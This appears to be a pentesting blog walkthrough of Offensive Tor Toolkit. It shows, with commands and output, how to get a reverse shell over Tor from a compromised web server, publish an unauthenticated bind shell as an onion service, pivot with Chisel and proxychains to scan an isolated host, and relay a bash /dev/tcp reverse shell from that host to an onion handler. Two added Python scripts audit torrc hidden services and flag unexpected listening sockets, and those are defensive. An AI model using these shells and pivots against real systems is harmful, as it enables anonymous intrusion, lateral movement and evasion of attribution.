Offensive Tor Toolkit PoC

In this post we will show how to use Offensive Tor Toolkit for pentesting over Tor. This suite of tools lets us run exploitation and post-exploitation tasks from the victim while preserving the attacker's anonymity. For more info, check the docs.

First of all, we have the following vulnerable scenario:

  • Victim1 serves a vulnerable service to the Internet.
  • Victim2 serves a vulnerable service to the internal network and has no Internet access.


Gaining access with reverse-shell-over-tor

We assume that we can already execute commands on Victim1 in some way. Then, to obtain a reverse shell while preserving anonymity, we use reverse-shell-over-tor from Offensive Tor Toolkit as follows:

  • Attacker: run the handler reachable from a Hidden Service.
[attacker]$ grep '^HiddenService' /etc/tor/torrc
HiddenServiceDir /tmp/tortest
HiddenServicePort 4444

[attacker]$ cat /tmp/tortest/hostname

[attacker]$ nc -lvnp 4444
  • Victim1: run reverse-shell-over-tor, pointing it at the handler's onion address.
[victim1]$ ./reverse-shell-over-tor \
    -listener m5et..jyd.onion:4444
  • Attacker: the reverse shell is caught by the handler.
[attacker]$ nc -lvnp 1234
uid=48(apache) gid=48(apache) groups=48(apache)

Reverse Shell over Tor
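As an added example (not part of Offensive Tor Toolkit or of the original post), the following Python script parses the HiddenServiceDir / HiddenServicePort directives shown in the torrc above and reports what each onion port maps to. It applies Tor's rule that a HiddenServicePort without an explicit target forwards to 127.0.0.1 on the same port, and it flags key directories kept under scratch paths such as /tmp, which is where someone auditing a host for an unsanctioned onion service would look first. The torrc text is constructed; only the /tmp/tortest directory name is taken from the post.

```python
"""Parse HiddenService directives from a torrc (added example, not toolkit code).

Tor syntax: `HiddenServicePort VIRTPORT [TARGET]`. Every HiddenServicePort line
belongs to the nearest HiddenServiceDir above it, and a missing TARGET means
127.0.0.1:VIRTPORT.
"""
from typing import Dict, List, Optional

# Constructed sample torrc; the /tmp/tortest directory mirrors the post above.
SAMPLE_TORRC = """\
# tor client settings
SocksPort 9050

HiddenServiceDir /tmp/tortest
HiddenServicePort 4444
HiddenServicePort 80 127.0.0.1:8080

HiddenServiceDir /var/lib/tor/web
HiddenServicePort 443 unix:/run/web.sock
"""

# Onion-service key material living under a scratch directory is a red flag
# on an audited host (persistent services keep it under /var/lib/tor).
TEMP_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_hidden_services(torrc_text: str) -> List[Dict]:
    """Return one record per HiddenServiceDir with its list of port mappings."""
    services: List[Dict] = []
    current: Optional[Dict] = None
    for raw in torrc_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        key, args = parts[0], parts[1:]
        if key == "HiddenServiceDir" and args:
            current = {"dir": args[0], "ports": []}
            services.append(current)
        elif key == "HiddenServicePort" and args:
            if current is None:
                raise ValueError("HiddenServicePort before any HiddenServiceDir")
            virtport = int(args[0])
            # Tor default when TARGET is omitted: same port on loopback.
            target = args[1] if len(args) > 1 else f"127.0.0.1:{virtport}"
            current["ports"].append({"virtport": virtport, "target": target})
    return services


def audit_hidden_services(torrc_text: str) -> List[str]:
    """Turn the parsed services into findings a reviewer can act on."""
    findings: List[str] = []
    for svc in parse_hidden_services(torrc_text):
        if svc["dir"].startswith(TEMP_PREFIXES):
            findings.append(f"keys under a temp dir: {svc['dir']}")
        for m in svc["ports"]:
            findings.append(f"{svc['dir']}: onion port {m['virtport']} -> {m['target']}")
    return findings


if __name__ == "__main__":
    for finding in audit_hidden_services(SAMPLE_TORRC):
        print(finding)
```

Run it against a real file with `audit_hidden_services(open("/etc/tor/torrc").read())`; the hostname file inside each HiddenServiceDir (as in `cat /tmp/tortest/hostname` above) then tells you which onion address each mapping is published under.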

Multi-shell access with bind shell

To get a bind shell served by Victim1, we use hidden-bind-shell as follows:

  • Victim1: run hidden-bind-shell, which publishes the shell as a Hidden Service.
[victim1]$ ./hidden-bind-shell \
    -data-dir /tmp/datadir/ \
    -hiddensrvport 1234
Bind shell is listening on hgnzi6j3rqog6yew.onion:1234
  • Attacker: connect to the Hidden Service to get a shell session.
[attacker]$ alias nctor='nc --proxy --proxy-type socks5'
[attacker]$ nctor -v hgnzi6j3rqog6yew.onion 1234
uid=48(apache) gid=48(apache) groups=48(apache)

Note that the -data-dir flag lets us bring the service up on the same onion address every time.

Currently, this bind shell has no authentication, so using it for persistence is dangerous: anyone who learns the onion address gets the same shell.

Hidden Bind Shell

Pivoting with hidden-portforwarding and Chisel

At this point, Victim1 is already compromised. To reach Victim2 (the machine on the isolated network), we pivot through Victim1 using hidden-portforwarding together with Chisel.

With this approach, we set up a Hidden Service on Victim1 that forwards to the Chisel server. From the attacker we can then open a tunnel with the Chisel client and send traffic through it.

The Chisel client allows the attacker to open a tunnel to the Chisel server.

  • Victim1: start the Chisel server and publish it through a Hidden Service with hidden-portforwarding.
[victim1]$ ./chisel server -p 1111 --socks5 &
[victim1]$ ./hidden-portforwarding \
    -data-dir /tmp/pf-datadir \
    -forward \
    -hidden-port 9001
Forwarding xa7ljkruk7lra4el.onion:9001 ->
  • Attacker: Connect Chisel client to the Chisel server through the Hidden Service.
[attacker]$ alias chisel-client-tor='chisel client --proxy socks://'
[attacker]$ chisel-client-tor xa7ljkruk7lra4el.onion:9001 socks &
[attacker]$ ss -lntp | grep chisel
LISTEN 0   4096*  users:(("chisel",pid=3730,fd=3))

Now the Chisel client is listening as a SOCKS5 proxy, so traffic sent through the proxy leaves through Victim1. To reach Victim2, just connect through this proxy as follows:

[attacker]$ alias pc4='proxychains4 -f /etc/proxychains4.conf'
[attacker]$ cat /etc/proxychains4.conf
socks5 1080

[attacker]$ pc4 nmap -sT -Pn -n -sV -sC -p80,22,25,3000 victim2
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
25/tcp   open  smtp    Postfix smtpd
80/tcp   open  http    Apache httpd 2.4.43 (() PHP/5.4.16)
3000/tcp open  http    Mongoose httpd

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 230.37 seconds

Hidden Portforwarding

Remote port forwarding through Tor

Victim2 has no Internet access, so it cannot reach Tor directly. Instead, we can use tcp2tor-proxy so that Victim1 acts as a Tor proxy for Victim2.

  • Victim1: set up the remote port forwarding so that connections to it reach the Hidden Service.
[victim1]$ ./tcp2tor-proxy -listen -onion-forward m5et..jyd.onion:4444
Proxying -> m5et..jyd.onion:4444
  • Attacker: set up a handler to receive reverse shells.
[attacker]$ nc -lnvp 1234
  • Victim2: Send the reverse shell to Victim1 (tcp2tor-proxy).
[victim2]$ bash -i >& /dev/tcp/victim1/60101 0>&1
  • Attacker: receive the reverse shell.
[attacker]$ nc -lnvp 1234
uid=48(apache) gid=48(apache) groups=48(apache)

Tcp2Tor Proxy
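Every tool run on Victim1 in the bind shell, pivoting and tcp2tor-proxy sections above leaves a listening socket on that host: chisel serves on its -p port, hidden-bind-shell and hidden-portforwarding run an embedded Tor that listens locally, and tcp2tor-proxy accepts plain TCP from the internal network. The following Python script, an added example that is not part of Offensive Tor Toolkit or of the original post, compares `ss -lntp` output against a per-host baseline of expected listeners and reports everything else. The sample output is constructed in the column layout `ss` prints; the ports 1111, 1234 and 60101 are the ones used in the post, the pids are made up.

```python
"""Flag unexpected listening sockets in `ss -lntp` output (added example, not
part of Offensive Tor Toolkit).

A baseline of expected listeners catches chisel, hidden-bind-shell,
hidden-portforwarding and tcp2tor-proxy alike, regardless of the binary's name.
"""
import re
from typing import Dict, List

# Constructed `ss -lntp` output for a web server. ss takes the process name from
# the kernel's comm field, which is limited to 15 characters, so
# "hidden-bind-shell" shows up truncated as "hidden-bind-she".
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128          0.0.0.0:22        0.0.0.0:*     users:(("sshd",pid=812,fd=3))
LISTEN 0      511          0.0.0.0:80        0.0.0.0:*     users:(("httpd",pid=1044,fd=4))
LISTEN 0      4096       127.0.0.1:1111      0.0.0.0:*     users:(("chisel",pid=3730,fd=3))
LISTEN 0      4096       127.0.0.1:1234      0.0.0.0:*     users:(("hidden-bind-she",pid=3801,fd=7))
LISTEN 0      128          0.0.0.0:60101     0.0.0.0:*     users:(("tcp2tor-proxy",pid=3912,fd=5))
"""

# Baseline: what this host is expected to serve, keyed by port -> process name.
EXPECTED_LISTENERS: Dict[int, str] = {22: "sshd", 80: "httpd"}

SS_LINE = re.compile(
    r"^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+"
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


def parse_listeners(ss_text: str) -> List[Dict]:
    """Extract address, port, process name and pid from each LISTEN line."""
    listeners: List[Dict] = []
    for line in ss_text.splitlines():
        m = SS_LINE.match(line)
        if m:
            listeners.append({"addr": m["addr"], "port": int(m["port"]),
                              "proc": m["proc"], "pid": int(m["pid"])})
    return listeners


def unexpected_listeners(ss_text: str,
                         expected: Dict[int, str] = EXPECTED_LISTENERS) -> List[Dict]:
    """Return listeners whose port is not in the baseline or is owned by the
    wrong process. Loopback-only sockets are included on purpose: the bind
    shell and chisel bind 127.0.0.1, so an external port scan never sees them."""
    findings: List[Dict] = []
    for entry in parse_listeners(ss_text):
        owner = expected.get(entry["port"])
        if owner is None:
            entry["reason"] = "port not in baseline"
        elif owner != entry["proc"]:
            entry["reason"] = f"port owned by {entry['proc']} instead of {owner}"
        else:
            continue
        findings.append(entry)
    return findings


if __name__ == "__main__":
    for f in unexpected_listeners(SAMPLE_SS_OUTPUT):
        print(f"{f['addr']}:{f['port']} {f['proc']} (pid {f['pid']}): {f['reason']}")
```

On a live host feed it the real output, for example `unexpected_listeners(subprocess.run(["ss", "-lntp"], capture_output=True, text=True).stdout)`; a hit on a loopback port is worth following up with the pid's executable path, since the tools above were started from /tmp.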